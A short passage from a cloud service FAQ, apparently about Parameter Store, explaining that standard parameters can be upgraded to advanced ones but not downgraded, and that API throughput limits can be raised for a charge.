A standard parameter may be converted into an advanced parameter at any time. Advanced parameters cannot be converted into standard parameters. If an advanced parameter’s enhanced capabilities are no longer required or you no longer want to incur charges for that parameter, you must delete the advanced parameter and then create a new parameter as a standard parameter.
Q: Can I increase the API throughput for Parameter Store?
Yes, API throughput can be raised to a higher limit through the Parameter Store settings tab. API throughput limits applies per region per account. Increased throughput limit incurs charges. See the pricing page for details. If you no longer need increased throughput, you may reset the limit at any time from the Settings tab.